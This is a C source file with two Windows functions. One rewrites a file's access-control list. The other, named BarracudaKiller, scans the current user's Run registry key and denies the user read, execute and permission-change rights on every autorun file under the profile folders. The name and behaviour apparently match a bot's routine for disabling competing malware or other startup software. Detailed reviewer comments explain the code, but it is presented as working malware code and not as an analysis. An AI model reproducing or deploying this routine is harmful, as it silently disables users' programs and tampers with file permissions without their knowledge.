#include <Windows.h>
#include <Aclapi.h>
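/*
 * Replace the DACL of the file at m_pwszFilePathName with a single ACE for the
 * calling user (trustee name "CURRENT_USER"): a DENY ACE when m_bDenyOrNot is
 * true, an ALLOW ACE otherwise, covering the access mask m_dwPermissions.
 *
 * Security notes for callers:
 *  - SetEntriesInAcl is given no existing ACL, so the file's explicit ACEs are
 *    replaced by this one entry, not merged with it. In the GRANT case that can
 *    silently remove rights other trustees had. No PROTECTED_DACL flag is set,
 *    so whether inherited ACEs are re-applied by SetNamedSecurityInfo depends on
 *    the object's inheritance state -- NOTE(review): confirm on the target volume.
 *  - Only a boolean is returned; the Win32 error code from the failing call is
 *    not surfaced to the caller.
 *
 * Parameters:
 *   m_pwszFilePathName  path of the file whose DACL is rewritten (must be non-NULL, non-empty)
 *   m_dwPermissions     access mask placed in the ACE
 *   m_bDenyOrNot        true -> DENY_ACCESS, false -> GRANT_ACCESS
 *
 * Returns true when the new DACL was applied, false on a NULL/empty path or on
 * any API failure.
 */
bool SetFilePrivileges(__in wchar_t* m_pwszFilePathName, __in DWORD m_dwPermissions, __in bool m_bDenyOrNot) {
    if ( m_pwszFilePathName == NULL || lstrlenW(m_pwszFilePathName) < 1 )
        return false;

    EXPLICIT_ACCESS_A m_stEntry = { 0 };
    PACL m_paDACL = NULL;
    bool m_bApplied = false;

    /* "CURRENT_USER" is a name BuildExplicitAccessWithName resolves itself. */
    BuildExplicitAccessWithNameA(&m_stEntry, "CURRENT_USER", m_dwPermissions,
                                 m_bDenyOrNot ? DENY_ACCESS : GRANT_ACCESS, NO_INHERITANCE);

    /* Build a fresh ACL containing only this entry (OldAcl is NULL: nothing is merged). */
    if ( SetEntriesInAclA(1, &m_stEntry, NULL, &m_paDACL) != ERROR_SUCCESS )
        return false;

    /* Apply it as the file's DACL; owner, group and SACL are left untouched. */
    if ( SetNamedSecurityInfoW(m_pwszFilePathName, SE_FILE_OBJECT, DACL_SECURITY_INFORMATION,
                               NULL, NULL, m_paDACL, NULL) == ERROR_SUCCESS )
        m_bApplied = true;

    /* The ACL returned by SetEntriesInAcl is LocalAlloc'd: release it on every
     * path, success included, not only on failure. */
    LocalFree(m_paDACL);
    return m_bApplied;
}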
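/*
 * Walk HKCU\Software\Microsoft\Windows\CurrentVersion\Run and, for every string
 * value whose data contains the expanded %USERPROFILE% or %ALLUSERSPROFILE%
 * path and names an existing file, replace that file's DACL with a DENY ACE
 * for the current user covering read, execute, write-attributes and WRITE_DAC
 * (see SetFilePrivileges). All comparisons are made on lowercased copies.
 *
 * Notes for reviewers:
 *  - The match is a plain substring test on the whole value data; nothing in
 *    this function identifies a particular product, so every autorun entry
 *    that lives under those profile directories is affected.
 *  - Value data is handed to GetFileAttributesW verbatim, so data that is a
 *    quoted path or a path followed by arguments is not found and is skipped.
 *  - If either environment variable cannot be expanded, or its expansion does
 *    not fit the buffer, the function returns without touching anything: an
 *    empty needle would make wcsstr() match every value in the key.
 *  - A value too long for the buffers (ERROR_MORE_DATA) is skipped instead of
 *    ending the enumeration, so later values are still examined.
 *  - Only REG_SZ / REG_EXPAND_SZ data is treated as a path; REG_EXPAND_SZ data
 *    is not expanded, so unexpanded %VAR% references will not match.
 *
 * Returns 0 unconditionally; the result of SetFilePrivileges is not checked.
 */
int BarracudaKiller()
{
    /* 0x00040021 | FILE_WRITE_ATTRIBUTES spelled out with the SDK names. */
    const DWORD m_dwDenyMask = WRITE_DAC | FILE_EXECUTE | FILE_READ_DATA | FILE_WRITE_ATTRIBUTES;

    wchar_t m_wszBarracuda[MAX_PATH] = { 0 };
    wchar_t m_wszUsers[MAX_PATH] = { 0 };
    wchar_t m_wszAllUsers[MAX_PATH] = { 0 };
    wchar_t m_wszValueName[256] = { 0 };
    HKEY m_hKey = NULL;
    DWORD m_dwRet = 0;
    DWORD i = 0;

    /* ExpandEnvironmentStringsW returns the size needed, in characters, including
     * the terminator: 0 is failure, a value above the buffer size is truncation. */
    m_dwRet = ExpandEnvironmentStringsW(L"%USERPROFILE%", m_wszUsers, _countof(m_wszUsers));
    if ( m_dwRet == 0 || m_dwRet > _countof(m_wszUsers) )
        return 0;
    CharLowerBuffW(m_wszUsers, lstrlenW(m_wszUsers));

    m_dwRet = ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%", m_wszAllUsers, _countof(m_wszAllUsers));
    if ( m_dwRet == 0 || m_dwRet > _countof(m_wszAllUsers) )
        return 0;
    CharLowerBuffW(m_wszAllUsers, lstrlenW(m_wszAllUsers));

    if ( RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_QUERY_VALUE, &m_hKey) != ERROR_SUCCESS )
        return 0;

    for ( i = 0; ; i++ ) {
        DWORD m_dwType = REG_NONE;
        DWORD m_dwNameLength = _countof(m_wszValueName);
        /* RegEnumValueW wants a byte count, not a character count. One wchar_t
         * is held back so the data can always be NUL-terminated below. */
        DWORD m_dwSize = sizeof(m_wszBarracuda) - sizeof(wchar_t);

        m_dwRet = RegEnumValueW(m_hKey, i, m_wszValueName, &m_dwNameLength, NULL, &m_dwType, (LPBYTE)m_wszBarracuda, &m_dwSize);
        if ( m_dwRet == ERROR_MORE_DATA )
            continue;   /* name or data too long for our buffers: skip this value only */
        if ( m_dwRet != ERROR_SUCCESS )
            break;      /* ERROR_NO_MORE_ITEMS, or a real failure */

        /* Only string data can name a file. */
        if ( m_dwType != REG_SZ && m_dwType != REG_EXPAND_SZ )
            continue;

        /* Registry strings are not guaranteed to carry a terminator. */
        m_wszBarracuda[m_dwSize / sizeof(wchar_t)] = L'\0';
        CharLowerBuffW(m_wszBarracuda, lstrlenW(m_wszBarracuda));

        if ( lstrlenW(m_wszBarracuda) == 0 )
            continue;
        if ( wcsstr(m_wszBarracuda, m_wszUsers) == NULL && wcsstr(m_wszBarracuda, m_wszAllUsers) == NULL )
            continue;
        if ( GetFileAttributesW(m_wszBarracuda) == INVALID_FILE_ATTRIBUTES )
            continue;

        /* Deny the current user read/execute/write-attributes/WRITE_DAC on the target. */
        SetFilePrivileges(m_wszBarracuda, m_dwDenyMask, true);
    }

    RegCloseKey(m_hKey);
    return 0;
}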